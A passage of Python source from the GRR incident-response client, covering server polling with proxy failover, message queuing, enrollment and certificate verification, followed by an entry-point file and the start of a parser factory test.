# Detect proxies from the OS environment.
result = client_utils.FindProxies()
# Also try to connect directly if all proxies fail.
result.append("")
# Also try all proxies configured in the config system.
result.extend(config.CONFIG["Client.proxy_servers"])
return result
def _ConcatenateURL(self, base, url):
if not url.startswith("/"):
url = "/" + url
if base.endswith("/"):
base = base[:-1]
return base + url
def OpenServerEndpoint(self,
path,
verify_cb=lambda x: True,
data=None,
params=None,
headers=None,
method="GET",
timeout=None):
"""Search through all the base URLs to connect to one that works.
This is a thin wrapper around requests.request() so most parameters are
documented there.
Args:
path: The URL path to access in this endpoint.
verify_cb: A callback which should return True if the response is
reasonable. This is used to detect if we are able to talk to the correct
endpoint. If not we try a different endpoint/proxy combination.
data: Parameters to send in POST bodies (See Requests documentation).
params: Parameters to send in GET URLs (See Requests documentation).
headers: Additional headers (See Requests documentation)
method: The HTTP method to use. If not set we select one automatically.
timeout: See Requests documentation.
Returns:
an HTTPObject() instance with the correct error code set.
"""
tries = 0
last_error = HTTPObject(code=404)
while tries < len(self.base_urls):
base_url_index = self.last_base_url_index % len(self.base_urls)
active_base_url = self.base_urls[base_url_index]
result = self.OpenURL(
self._ConcatenateURL(active_base_url, path),
data=data,
params=params,
headers=headers,
method=method,
timeout=timeout,
verify_cb=verify_cb,
)
if not result.Success():
tries += 1
self.last_base_url_index += 1
last_error = result
continue
# The URL worked - we record that.
self.active_base_url = active_base_url
return result
# No connection is possible at all.
logging.info(
"Could not connect to GRR servers %s, directly or through "
"these proxies: %s.", self.base_urls, self.proxies)
return last_error
def OpenURL(self,
url,
verify_cb=lambda x: True,
data=None,
params=None,
headers=None,
method="GET",
timeout=None):
"""Get the requested URL.
Note that we do not have any concept of timing here - we try to connect
through all proxies as fast as possible until one works. Timing and poll
frequency is left to the calling code.
Args:
url: The URL to fetch
verify_cb: An optional callback which can be used to validate the URL. It
receives the HTTPObject and return True if this seems OK, False
otherwise. For example, if we are behind a captive portal we might
receive invalid object even though HTTP status is 200.
data: Parameters to send in POST bodies (See Requests documentation).
params: Parameters to send in GET URLs (See Requests documentation).
headers: Additional headers (See Requests documentation)
method: The HTTP method to use. If not set we select one automatically.
timeout: See Requests documentation.
Returns:
An HTTPObject instance or None if a connection could not be made.
"""
# Start checking the proxy from the last value found.
tries = 0
last_error = 500
while tries < len(self.proxies):
proxy_index = self.last_proxy_index % len(self.proxies)
proxy = self.proxies[proxy_index]
try:
proxydict = {}
if proxy:
proxydict["http"] = proxy
proxydict["https"] = proxy
headers = (headers or {}).copy()
headers["Cache-Control"] = "no-cache"
if data:
method = "POST"
duration, handle = self._RetryRequest(
url=url,
data=data,
params=params,
headers=headers,
method=method,
timeout=timeout,
proxies=proxydict,
)
data = handle.content
result = HTTPObject(
url=url, data=data, proxy=proxy, code=200, duration=duration)
if not verify_cb(result):
raise IOError("Data not verified.")
# The last connection worked.
self.consecutive_connection_errors = 0
return result
except requests.RequestException as e:
# Especially trap a 406 error message - it means the client needs to
# enroll.
if e.response is not None:
last_error = e.response.status_code
if last_error == 406:
# A 406 is not considered an error as the frontend is reachable. If
# we considered it as an error the client would be unable to send
# the enrollment request since connection errors disable message
# draining.
self.consecutive_connection_errors = 0
return HTTPObject(code=406)
# Try the next proxy
self.last_proxy_index = proxy_index + 1
tries += 1
# Catch any exceptions that dont have a code (e.g. socket.error).
except IOError:
# Try the next proxy
self.last_proxy_index = proxy_index + 1
tries += 1
last_error = 500
# Catch unexpected exceptions. If the error is proxy related it makes
# sense to cycle the proxy before reraising. One error we have seen here
# is ProxySchemeUnknown but urllib can raise many different exceptions, it
# doesn't make sense to enumerate them all.
except Exception: # pylint: disable=broad-except
logging.exception(
"Got an unexpected exception while connecting to the server.")
# Try the next proxy
self.last_proxy_index = proxy_index + 1
tries += 1
last_error = 500
# We failed to connect at all here.
return HTTPObject(code=last_error)
def _RetryRequest(self, timeout=None, **request_args):
"""Retry the request a few times before we determine it failed.
Sometimes the frontend becomes loaded and issues a 500 error to throttle the
clients. We wait Client.error_poll_min seconds between each attempt to back
off the frontend. Note that this does not affect any timing algorithm in the
client itself which is controlled by the Timer() class.
Args:
timeout: Timeout for retry.
**request_args: Args to the requests.request call.
Returns:
a tuple of duration, urllib.request.urlopen response.
"""
while True:
try:
now = time.time()
if not timeout:
timeout = config.CONFIG["Client.http_timeout"]
result = requests.request(**request_args)
# By default requests doesn't raise on HTTP error codes.
result.raise_for_status()
# Requests does not always raise an exception when an incorrect response
# is received. This fixes that behaviour.
if not result.ok:
raise requests.RequestException(response=result)
return time.time() - now, result
# Catch any exceptions that dont have a code (e.g. socket.error).
except IOError as e:
self.consecutive_connection_errors += 1
# Request failed. If we connected successfully before we attempt a few
# connections before we determine that it really failed. This might
# happen if the front end is loaded and returns a few throttling 500
# messages.
if self.active_base_url is not None:
# Propagate 406 immediately without retrying, as 406 is a valid
# response that indicates a need for enrollment.
response = getattr(e, "response", None)
if getattr(response, "status_code", None) == 406:
raise
if self.consecutive_connection_errors >= self.retry_error_limit:
# We tried several times but this really did not work, just fail it.
logging.info(
"Too many connection errors to %s, retrying another URL",
self.active_base_url)
self.active_base_url = None
raise e
# Back off hard to allow the front end to recover.
logging.debug(
"Unable to connect to frontend. Backing off %s seconds.",
self.error_poll_min)
self.Wait(self.error_poll_min)
# We never previously connected, maybe the URL/proxy is wrong? Just fail
# right away to allow callers to try a different URL.
else:
raise e
def Wait(self, timeout):
"""Wait for the specified timeout."""
time.sleep(timeout - int(timeout))
# Split a long sleep interval into 1 second intervals so we can heartbeat.
for _ in range(int(timeout)):
time.sleep(1)
if self.heart_beat_cb:
self.heart_beat_cb()
def ErrorLimitReached(self):
return self.consecutive_connection_errors > self.connection_error_limit
class Timer(object):
"""Implements the polling policy.
External code simply calls our Wait() method without regard to the exact
timing policy.
"""
# Slew of poll time.
poll_slew = 1.15
def __init__(self):
self.poll_min = config.CONFIG["Client.poll_min"]
self.sleep_time = self.poll_max = config.CONFIG["Client.poll_max"]
def FastPoll(self):
"""Switch to fast poll mode."""
self.sleep_time = self.poll_min
def SlowPoll(self):
"""Switch to slow poll mode."""
self.sleep_time = self.poll_max
def Wait(self):
"""Wait until the next action is needed."""
time.sleep(self.sleep_time - int(self.sleep_time))
# Split a long sleep interval into 1 second intervals so we can heartbeat.
for _ in range(int(self.sleep_time)):
time.sleep(1)
# Back off slowly at first and fast if no answer.
self.sleep_time = min(self.poll_max,
max(self.poll_min, self.sleep_time) * self.poll_slew)
class GRRClientWorker(threading.Thread):
"""This client worker runs the main loop in another thread.
The client which uses this worker is not blocked while queuing messages to be
worked on. There is only a single working thread though.
The overall effect is that the HTTP client is not blocked waiting for actions
to be executed, and at the same time, the client working thread is not blocked
waiting on network latency.
"""
stats_collector = None
sent_bytes_per_flow = {}
# Client sends stats notifications at least every 50 minutes.
STATS_MAX_SEND_INTERVAL = rdfvalue.Duration("50m")
# Client sends stats notifications at most every 60 seconds.
STATS_MIN_SEND_INTERVAL = rdfvalue.Duration("60s")
def __init__(self,
client=None,
out_queue=None,
internal_nanny_monitoring=True,
heart_beat_cb=None):
threading.Thread.__init__(self)
# A reference to the parent client that owns us.
self.client = client
self._is_active = False
self.proc = psutil.Process()
self.nanny_controller = None
self.transaction_log = client_utils.TransactionLog()
if internal_nanny_monitoring:
self.StartNanny()
if heart_beat_cb is None:
heart_beat_cb = self.nanny_controller.Heartbeat
self.heart_beat_cb = heart_beat_cb
self.lock = threading.RLock()
# The worker may communicate over HTTP independently from the comms
# thread. This way we do not need to synchronize the HTTP manager between
# the two threads.
self.http_manager = HTTPManager(heart_beat_cb=heart_beat_cb)
# This queue should never hit its maximum since the server will throttle
# messages before this.
self._in_queue = utils.HeartbeatQueue(callback=heart_beat_cb, maxsize=1024)
if out_queue is not None:
self._out_queue = out_queue
else:
# The size of the output queue controls the worker thread. Once this queue
# is too large, the worker thread will block until the queue is drained.
self._out_queue = SizeLimitedQueue(
maxsize=config.CONFIG["Client.max_out_queue"],
heart_beat_cb=heart_beat_cb)
# Only start this thread after the _out_queue is ready to send.
self.StartStatsCollector()
self.daemon = True
def QueueResponse(self, message, blocking=True):
"""Pushes the Serialized Message on the output queue."""
self._out_queue.Put(message, block=blocking)
def Drain(self, max_size=1024):
"""Return a GrrQueue message list from the queue, draining it.
This is used to get the messages going _TO_ the server when the
client connects.
Args:
max_size: The size (in bytes) of the returned protobuf will be at most
one message length over this size.
Returns:
A MessageList protobuf
"""
return self._out_queue.GetMessages(soft_size_limit=max_size)
def QueueMessages(self, messages):
"""Push messages to the input queue."""
# Push all the messages to our input queue
for message in messages:
self._in_queue.put(message, block=True)
def InQueueSize(self):
"""Returns the number of protobufs ready to be sent in the queue."""
return self._in_queue.qsize()
def OutQueueSize(self):
"""Returns the total size of messages ready to be sent."""
return self._out_queue.Size()
def SyncTransactionLog(self):
self.transaction_log.Sync()
def Heartbeat(self):
if self.heart_beat_cb:
self.heart_beat_cb()
def StartNanny(self):
# Use this to control the nanny transaction log.
self.nanny_controller = client_utils.NannyController()
self.nanny_controller.StartNanny()
def StartStatsCollector(self):
if not GRRClientWorker.stats_collector:
GRRClientWorker.stats_collector = client_stats.ClientStatsCollector(self)
GRRClientWorker.stats_collector.start()
def SendReply(self,
rdf_value=None,
request_id=None,
response_id=None,
session_id="W:0",
message_type=None,
name=None,
require_fastpoll=None,
ttl=None,
blocking=True,
task_id=None):
"""Send the protobuf to the server.
Args:
rdf_value: The RDFvalue to return.
request_id: The id of the request this is a response to.
response_id: The id of this response.
session_id: The session id of the flow.
message_type: The contents of this message, MESSAGE, STATUS, ITERATOR or
RDF_VALUE.
name: The name of the client action that sends this response.
require_fastpoll: If set, this will set the client to fastpoll mode after
sending this message.
ttl: The time to live of this message.
blocking: If the output queue is full, block until there is space.
task_id: The task ID that the request was queued at. We send this back to
the server so it can de-queue the request.
Raises:
RuntimeError: An object other than an RDFValue was passed for sending.
"""
if not isinstance(rdf_value, rdfvalue.RDFValue):
raise RuntimeError("Sending objects other than RDFValues not supported.")
message = rdf_flows.GrrMessage(
session_id=session_id,
task_id=task_id,
name=name,
response_id=response_id,
request_id=request_id,
require_fastpoll=require_fastpoll,
ttl=ttl,
type=message_type)
if rdf_value is not None:
message.payload = rdf_value
serialized_message = message.SerializeToString()
self.ChargeBytesToSession(session_id, len(serialized_message))
if message.type == rdf_flows.GrrMessage.Type.STATUS:
rdf_value.network_bytes_sent = self.sent_bytes_per_flow[session_id]
del self.sent_bytes_per_flow[session_id]
message.payload = rdf_value
try:
self.QueueResponse(message, blocking=blocking)
except queue.Full:
# In the case of a non blocking send, we reraise the exception to notify
# the caller that something went wrong.
if not blocking:
raise
# There is nothing we can do about it here - we just lose the message and
# keep going.
logging.info("Queue is full, dropping messages.")
@utils.Synchronized
def ChargeBytesToSession(self, session_id, length, limit=0):
self.sent_bytes_per_flow.setdefault(session_id, 0)
self.sent_bytes_per_flow[session_id] += length
# Check after incrementing so that sent_bytes_per_flow goes over the limit
# even though we don't send those bytes. This makes sure flow_runner will
# die on the flow.
if limit and self.sent_bytes_per_flow[session_id] > limit:
self.SendClientAlert("Network limit exceeded.")
raise actions.NetworkBytesExceededError(
"Action exceeded network send limit.")
def HandleMessage(self, message):
"""Entry point for processing jobs.
Args:
message: The GrrMessage that was delivered from the server.
Raises:
RuntimeError: The client action requested was not found.
"""
self._is_active = True
try:
action_cls = actions.ActionPlugin.classes.get(message.name)
if action_cls is None:
raise RuntimeError("Client action %r not known" % message.name)
action = action_cls(grr_worker=self)
# Write the message to the transaction log.
self.transaction_log.Write(message)
# Heartbeat so we have the full period to work on this message.
action.Progress()
action.Execute(message)
# If we get here without exception, we can remove the transaction.
self.transaction_log.Clear()
finally:
self._is_active = False
# We want to send ClientStats when client action is complete.
self.stats_collector.RequestSend()
def MemoryExceeded(self):
"""Returns True if our memory footprint is too large."""
rss_size = self.proc.memory_info().rss
return rss_size // 1024 // 1024 > config.CONFIG["Client.rss_max"]
def IsActive(self):
"""Returns True if worker is currently handling a message."""
return self._is_active
def SendNannyMessage(self):
# We might be monitored by Fleetspeak.
if not self.nanny_controller:
return
msg = self.nanny_controller.GetNannyMessage()
if msg:
self.SendReply(
rdf_protodict.DataBlob(string=msg),
session_id=rdfvalue.FlowSessionID(flow_name="NannyMessage"),
require_fastpoll=False)
self.nanny_controller.ClearNannyMessage()
def SendClientAlert(self, msg):
self.SendReply(
rdf_protodict.DataBlob(string=msg),
session_id=rdfvalue.FlowSessionID(flow_name="ClientAlert"),
require_fastpoll=False)
def Sleep(self, timeout):
"""Sleeps the calling thread with heartbeat."""
if self.nanny_controller:
self.nanny_controller.Heartbeat()
# Split a long sleep interval into 1 second intervals so we can heartbeat.
while timeout > 0:
time.sleep(min(1., timeout))
timeout -= 1
# If the output queue is full, we are ready to do a post - no
# point in waiting.
if self._out_queue.Full():
return
if self.nanny_controller:
self.nanny_controller.Heartbeat()
def OnStartup(self):
"""A handler that is called on client startup."""
# We read the transaction log and fail any requests that are in it. If there
# is anything in the transaction log we assume its there because we crashed
# last time and let the server know.
last_request = self.transaction_log.Get()
if last_request:
status = rdf_flows.GrrStatus(
status=rdf_flows.GrrStatus.ReturnedStatus.CLIENT_KILLED,
error_message="Client killed during transaction")
if self.nanny_controller:
nanny_status = self.nanny_controller.GetNannyStatus()
if nanny_status:
status.nanny_status = nanny_status
self.SendReply(
status,
request_id=last_request.request_id,
response_id=1,
session_id=last_request.session_id,
message_type=rdf_flows.GrrMessage.Type.STATUS)
self.transaction_log.Clear()
# Inform the server that we started.
action = admin.SendStartupInfo(grr_worker=self)
action.Run(None, ttl=1)
def run(self):
"""Main thread for processing messages."""
self.OnStartup()
try:
while True:
message = self._in_queue.get()
# A message of None is our terminal message.
if message is None:
break
try:
self.HandleMessage(message)
# Catch any errors and keep going here
except Exception as e: # pylint: disable=broad-except
logging.warn("%s", e)
self.SendReply(
rdf_flows.GrrStatus(
status=rdf_flows.GrrStatus.ReturnedStatus.GENERIC_ERROR,
error_message=utils.SmartUnicode(e)),
request_id=message.request_id,
response_id=1,
session_id=message.session_id,
task_id=message.task_id,
message_type=rdf_flows.GrrMessage.Type.STATUS)
if flags.FLAGS.debug:
pdb.post_mortem()
except Exception as e: # pylint: disable=broad-except
logging.error("Exception outside of the processing loop: %r", e)
finally:
# There's no point in running the client if it's broken out of the
# processing loop and it should be restarted shortly anyway.
logging.fatal("The client has broken out of its processing loop.")
# The binary (Python threading library, perhaps) has proven in tests to be
# very persistent to termination calls, so we kill it with fire.
os.kill(os.getpid(), signal.SIGKILL)
class SizeLimitedQueue(object):
"""A Queue which limits the total size of its elements.
The standard Queue implementations uses the total number of elements to block
on. In the client we want to limit the total memory footprint, hence we need
to use the total size as a measure of how full the queue is.
"""
def __init__(self, heart_beat_cb, maxsize=1024):
self._queue = collections.deque()
self._lock = threading.Lock()
self._total_size = 0
self._maxsize = maxsize
self._heart_beat_cb = heart_beat_cb
def Put(self, message, block=True, timeout=1000):
"""Put a message on the queue, blocking if it is too full.
Blocks when the queue contains more than the threshold.
Args:
message: rdf_flows.GrrMessage The message to put.
block: bool If True, we block and wait for the queue to have more space.
Otherwise, if the queue is full, we raise.
timeout: int Maximum time (in seconds, with 1 sec resolution) we spend
waiting on the queue.
Raises:
queue.Full: if the queue is full and block is False, or
timeout is exceeded.
"""
# We only queue already serialized objects so we know how large they are.
message = message.SerializeToString()
if not block:
if self.Full():
raise queue.Full
else:
t0 = time.time()
while self.Full():
time.sleep(1)
self._heart_beat_cb()
if time.time() - t0 > timeout:
raise queue.Full
with self._lock:
self._queue.appendleft(message)
self._total_size += len(message)
def _Generate(self):
"""Yields messages from the queue. Lock should be held by the caller."""
while self._queue:
yield self._queue.pop()
def GetMessages(self, soft_size_limit=None):
"""Retrieves and removes the messages from the queue.
Args:
soft_size_limit: int If there is more data in the queue than
soft_size_limit bytes, the returned list of messages will be
approximately this large. If None (default), returns all messages
currently on the queue.
Returns:
rdf_flows.MessageList A list of messages that were .Put on the queue
earlier.
"""
with self._lock:
ret = rdf_flows.MessageList()
ret_size = 0
for message in self._Generate():
self._total_size -= len(message)
ret.job.append(rdf_flows.GrrMessage.FromSerializedString(message))
ret_size += len(message)
if soft_size_limit is not None and ret_size > soft_size_limit:
break
return ret
def Size(self):
return self._total_size
def Full(self):
return self._total_size >= self._maxsize
class GRRHTTPClient(object):
"""A class which abstracts away HTTP communications.
To create a new GRR HTTP client, instantiate this class and generate
its Run() method.
The HTTP client starts up by loading a communicator which will read the
client's public key (or create a new random key). Since the client ID is based
on the key (its a hash of the public key), the communicator controls the
client name.
The client worker is then created - this will be the main thread for executing
server messages.
The client then creates a HTTPManager() instance to control communication with
the front end over HTTP, and a Timer() instance to control polling policy.
The HTTP client simply reads pending messages from the client worker queues
and makes POST requests to the server. The POST request may return the
following error conditions:
- A successful POST is signified by a status of 200: The client worker is
given any requests the server has sent.
- A status code of 406 means that the server is unable to communicate with
the client. The client will then prepare an enrollment request CSR and
send that. Enrollment requests are throttled to a
maximum of one every 10 minutes.
- A status code of 500 is an error, the messages are re-queued and the
client waits and retries to send them later.
"""
http_manager_class = HTTPManager
def __init__(self, ca_cert=None, worker_cls=None, private_key=None):
"""Constructor.
Args:
ca_cert: String representation of a CA certificate to use for checking
server certificate.
worker_cls: The client worker class to use. Defaults to GRRClientWorker.
private_key: The private key for this client. Defaults to config
Client.private_key.
"""
self.ca_cert = ca_cert
if private_key is None:
private_key = config.CONFIG.Get("Client.private_key", default=None)
# The server's PEM encoded certificate.
self.server_certificate = None
# This manages our HTTP connections. Note: The comms thread is allowed to
# block indefinitely since the worker thread is responsible for
# heart-beating the nanny. We assume that HTTP requests can not block
# indefinitely.
self.http_manager = self.http_manager_class()
# The communicator manages our crypto with the server.
self.communicator = ClientCommunicator(private_key=private_key)
# This controls our polling frequency.
self.timer = Timer()
# The time we last sent an enrollment request. Enrollment requests are
# throttled especially to a maximum of one every 10 minutes.
self.last_enrollment_time = 0
# The time we last checked with the foreman.
self.last_foreman_check = 0
# The client worker does all the real work here.
if worker_cls:
self.client_worker = worker_cls(client=self)
else:
self.client_worker = GRRClientWorker(client=self)
# TODO(hanuszczak): Maybe we should start the thread in `GRRHTTPClient::Run`
# method instead? Starting threads in constructor is rarely a good idea, is
# it guaranteed that we call `GRRHTTPClient::Run` only once?
self.client_worker.start()
def FleetspeakEnabled(self):
return False
def VerifyServerPEM(self, http_object):
"""Check the server PEM for validity.
This is used to determine connectivity to the server. Sometimes captive
portals return a valid HTTP status, but the data is corrupted.
Args:
http_object: The response received from the server.
Returns:
True if the response contains a valid server certificate.
"""
try:
server_pem = http_object.data
server_url = http_object.url
if "BEGIN CERTIFICATE" in server_pem:
# Now we know that this proxy is working. We still have to verify the
# certificate. This will raise if the server cert is invalid.
server_certificate = rdf_crypto.RDFX509Cert(server_pem)
self.communicator.LoadServerCertificate(
server_certificate=server_certificate, ca_certificate=self.ca_cert)
logging.info("Server PEM re-keyed.")
return True
except Exception as e: # pylint: disable=broad-except
logging.info("Unable to verify server certificate at %s: %s", server_url,
e)
return False
def VerifyServerControlResponse(self, http_object):
"""Verify the server response to a 'control' endpoint POST message.
We consider the message correct if and only if we can decrypt it
properly. Note that in practice we can not use the HTTP status to figure out
if the request worked because captive proxies have a habit of lying and
returning a HTTP success code even when there is no connectivity.
Args:
http_object: The HTTPObject returned from the HTTP transaction.
Returns:
True if the http_object is correct. False if it is not valid.
Side Effect:
Fill in the decoded_data attribute in the http_object.
"""
if http_object.code != 200:
return False
# Try to decrypt the message into the http_object.
try:
http_object.messages, http_object.source, http_object.nonce = (
self.communicator.DecryptMessage(http_object.data))
return True
# Something went wrong - the response seems invalid!
except communicator.DecodingError as e:
logging.info("Protobuf decode error: %s.", e)
return False
def MakeRequest(self, data):
"""Make a HTTP Post request to the server 'control' endpoint."""
stats_collector_instance.Get().IncrementCounter("grr_client_sent_bytes",
len(data))
# Verify the response is as it should be from the control endpoint.
response = self.http_manager.OpenServerEndpoint(
path="control?api=%s" % config.CONFIG["Network.api"],
verify_cb=self.VerifyServerControlResponse,
data=data,
headers={"Content-Type": "binary/octet-stream"})
if response.code == 406:
self.InitiateEnrolment()
return response
if response.code == 200:
stats_collector_instance.Get().IncrementCounter(
"grr_client_received_bytes", len(response.data))
return response
# An unspecified error occured.
return response
def RunOnce(self):
"""Makes a single request to the GRR server.
Returns:
A Status() object indicating how the last POST went.
"""
# Attempt to fetch and load server certificate.
if not self._FetchServerCertificate():
self.timer.Wait()
return HTTPObject(code=500)
# Here we only drain messages if we were able to connect to the server in
# the last poll request. Otherwise we just wait until the connection comes
# back so we don't expire our messages too fast.
if self.http_manager.consecutive_connection_errors == 0:
# Grab some messages to send
message_list = self.client_worker.Drain(
max_size=config.CONFIG["Client.max_post_size"])
else:
message_list = rdf_flows.MessageList()
# If any outbound messages require fast poll we switch to fast poll mode.
for message in message_list.job:
if message.require_fastpoll:
self.timer.FastPoll()
break
# Make new encrypted ClientCommunication rdfvalue.
payload = rdf_flows.ClientCommunication()
# If our memory footprint is too large, we advertise that our input queue
# is full. This will prevent the server from sending us any messages, and
# hopefully allow us to work down our memory usage, by processing any
# outstanding messages.
if self.client_worker.MemoryExceeded():
logging.info("Memory exceeded, will not retrieve jobs.")
payload.queue_size = 1000000
else:
# Let the server know how many messages are currently queued in
# the input queue.
payload.queue_size = self.client_worker.InQueueSize()
nonce = self.communicator.EncodeMessages(message_list, payload)
payload_data = payload.SerializeToString()
response = self.MakeRequest(payload_data)
# Unable to decode response or response not valid.
if response.code != 200 or response.messages is None:
# We don't print response here since it should be encrypted and will
# cause ascii conversion errors.
logging.info("%s: Could not connect to server at %s, status %s",
self.communicator.common_name,
self.http_manager.active_base_url, response.code)
# Force the server pem to be reparsed on the next connection.
self.server_certificate = None
# Reschedule the tasks back on the queue so they get retried next time.
messages = list(message_list.job)
for message in messages:
message.require_fastpoll = False
message.ttl -= 1
if message.ttl > 0:
self.client_worker.QueueResponse(message)
else:
logging.info("Dropped message due to retransmissions.")
return response
# Check the decoded nonce was as expected.
if response.nonce != nonce:
logging.info("Nonce not matched.")
response.code = 500
return response
if response.source != self.communicator.server_name:
logging.info("Received a message not from the server "
"%s, expected %s.", response.source,
self.communicator.server_name)
response.code = 500
return response
# Check to see if any inbound messages want us to fastpoll. This means we
# drop to fastpoll immediately on a new request rather than waiting for the
# next beacon to report results.
for message in response.messages:
if message.require_fastpoll:
self.timer.FastPoll()
break
# Process all messages. Messages can be processed by clients in
# any order since clients do not have state.
self.client_worker.QueueMessages(response.messages)
cn = self.communicator.common_name
logging.info(
"%s: Sending %s(%s), Received %s messages in %s sec. "
"Sleeping for %s sec.", cn, len(message_list), len(payload_data),
len(response.messages), response.duration, self.timer.sleep_time)
return response
def SendForemanRequest(self):
self.client_worker.SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False)
def _FetchServerCertificate(self):
"""Attempts to fetch the server cert.
Returns:
True if we succeed.
"""
# Certificate is loaded and still valid.
if self.server_certificate:
return True
response = self.http_manager.OpenServerEndpoint(
"server.pem", verify_cb=self.VerifyServerPEM)
if response.Success():
self.server_certificate = response.data
return True
# We failed to fetch the cert, switch to slow poll mode.
self.timer.SlowPoll()
return False
def Run(self):
"""The main run method of the client.
This method does not normally return. Only if there have been more than
connection_error_limit failures, the method returns and allows the
client to exit.
"""
while True:
if self.http_manager.ErrorLimitReached():
return
# Check if there is a message from the nanny to be sent.
self.client_worker.SendNannyMessage()
now = time.time()
# Check with the foreman if we need to
if (now > self.last_foreman_check +
config.CONFIG["Client.foreman_check_frequency"]):
# We must not queue messages from the comms thread with blocking=True
# or we might deadlock. If the output queue is full, we can't accept
# more work from the foreman anyways so it's ok to drop the message.
try:
self.client_worker.SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False,
blocking=False)
self.last_foreman_check = now
except queue.Full:
pass
try:
self.RunOnce()
except Exception: # pylint: disable=broad-except
# Catch everything, yes, this is terrible but necessary
logging.warn("Uncaught exception caught: %s", traceback.format_exc())
if flags.FLAGS.debug:
pdb.post_mortem()
# We suicide if our memory is exceeded, and there is no more work to do
# right now. Our death should not result in loss of messages since we are
# not holding any requests in our input queues.
if (self.client_worker.MemoryExceeded() and
not self.client_worker.IsActive() and
self.client_worker.InQueueSize() == 0 and
self.client_worker.OutQueueSize() == 0):
logging.warning("Memory exceeded - exiting.")
self.client_worker.SendClientAlert("Memory limit exceeded, exiting.")
# Make sure this will return True so we don't get more work.
# pylint: disable=g-bad-name
self.client_worker.MemoryExceeded = lambda: True
# pylint: enable=g-bad-name
# Now send back the client message.
self.RunOnce()
# And done for now.
sys.exit(-1)
self.timer.Wait()
def InitiateEnrolment(self):
"""Initiate the enrollment process.
We do not sent more than one enrollment request every 10 minutes. Note that
we still communicate to the server in fast poll mode, but these requests are
not carrying any payload.
"""
logging.debug("sending enrollment request")
now = time.time()
if now > self.last_enrollment_time + 10 * 60:
if not self.last_enrollment_time:
# This is the first enrollment request - we should enter fastpoll mode.
self.timer.FastPoll()
self.last_enrollment_time = now
# Send registration request:
self.client_worker.SendReply(
rdf_crypto.Certificate(
type=rdf_crypto.Certificate.Type.CSR,
pem=self.communicator.GetCSRAsPem()),
session_id=rdfvalue.SessionID(
queue=queues.ENROLLMENT, flow_name="Enrol"))
class ClientCommunicator(communicator.Communicator):
"""A communicator implementation for clients.
This extends the generic communicator to include verification of
server side certificates.
"""
def __init__(self, certificate=None, private_key=None):
super(ClientCommunicator, self).__init__(
certificate=certificate, private_key=private_key)
self.InitPrivateKey()
def InitPrivateKey(self):
"""Makes sure this client has a private key set.
It first tries to load an RSA key from the certificate.
If no certificate is found, or it is invalid, we make a new random RSA key,
and store it as our certificate.
Returns:
An RSA key - either from the certificate or a new random key.
"""
if self.private_key:
try:
self.common_name = rdf_client.ClientURN.FromPrivateKey(self.private_key)
logging.info("Starting client %s", self.common_name)
return self.private_key
except type_info.TypeValueError:
pass
# We either have an invalid key or no key. We just generate a new one.
key = rdf_crypto.RSAPrivateKey.GenerateKey(
bits=config.CONFIG["Client.rsa_key_length"])
self.common_name = rdf_client.ClientURN.FromPrivateKey(key)
logging.info("Client pending enrolment %s", self.common_name)
# Save the keys
self.SavePrivateKey(key)
return key
def GetCSR(self):
"""Return our CSR."""
return rdf_crypto.CertificateSigningRequest(
common_name=self.common_name, private_key=self.private_key)
def GetCSRAsPem(self):
"""Return our CSR in PEM format."""
return self.GetCSR().AsPEM()
def SavePrivateKey(self, private_key):
"""Store the new private key on disk."""
self.private_key = private_key
config.CONFIG.Set("Client.private_key",
self.private_key.SerializeToString())
config.CONFIG.Write()
def LoadServerCertificate(self, server_certificate=None, ca_certificate=None):
"""Loads and verifies the server certificate."""
# Check that the server certificate verifies
try:
server_certificate.Verify(ca_certificate.GetPublicKey())
except rdf_crypto.VerificationError as e:
self.server_name = None
raise IOError("Server cert is invalid: %s" % e)
# Make sure that the serial number is higher.
server_cert_serial = server_certificate.GetSerialNumber()
if server_cert_serial < config.CONFIG["Client.server_serial_number"]:
# We can not accept this serial number...
raise IOError("Server certificate serial number is too old.")
elif server_cert_serial > config.CONFIG["Client.server_serial_number"]:
logging.info("Server serial number updated to %s", server_cert_serial)
config.CONFIG.Set("Client.server_serial_number", server_cert_serial)
# Save the new data to the config file.
config.CONFIG.Write()
self.server_name = server_certificate.GetCN()
self.server_certificate = server_certificate
self.ca_certificate = ca_certificate
self.server_public_key = server_certificate.GetPublicKey()
# If we still have a cached session key, we need to remove it.
self._ClearServerCipherCache()
def EncodeMessages(self, message_list, result, **kwargs):
# Force the right API to be used
kwargs["api_version"] = config.CONFIG["Network.api"]
return super(ClientCommunicator, self).EncodeMessages(
message_list, result, **kwargs)
def _GetRemotePublicKey(self, common_name):
if common_name == self.server_name:
return self.server_public_key
raise communicator.UnknownClientCertError(
"Client wants to talk to %s, not %s" % (common_name, self.server_name))
```
#### File: client/grr_response_client/distro_entry.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
# pylint: disable=g-import-not-at-top
def ClientBuild():
from grr_response_client import client_build
client_build.Run()
def Client():
from grr_response_client import client
flags.StartMain(client.main)
def FleetspeakClient():
from grr_response_client import grr_fs_client
flags.StartMain(grr_fs_client.main)
def PoolClient():
from grr_response_client import poolclient
flags.StartMain(poolclient.main)
```
#### File: lib/parsers/parsers_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
from future.builtins import map
import mock
from grr_response_core.lib import factory
from grr_response_core.lib import flags
from grr_response_core.lib import parser
from grr_response_core.lib import parsers
from grr.test_lib import test_lib
class ArtifactParserFactoryTest(absltest.TestCase):
@mock.patch.object(parsers, "SINGLE_RESPONSE_PARSER_FACTORY",
factory.Factory(parser.SingleResponseParser))
def testSingleResponseParsers(self):
class FooParser(parser.SingleResponseParser):
supported_artifacts = ["Quux", "Norf"]
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
class BarParser(parser.SingleResponseParser):
supported_artifacts = ["Norf", "Thud"]
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
class BazParser(parser.SingleResponseParser):
supported_artifacts = ["Thud", "Quux"]
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Bar", BarParser)
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Baz", BazParser)
quux_factory = parsers.ArtifactParserFactory("Quux")
quux_parsers = quux_factory.SingleResponseParsers()
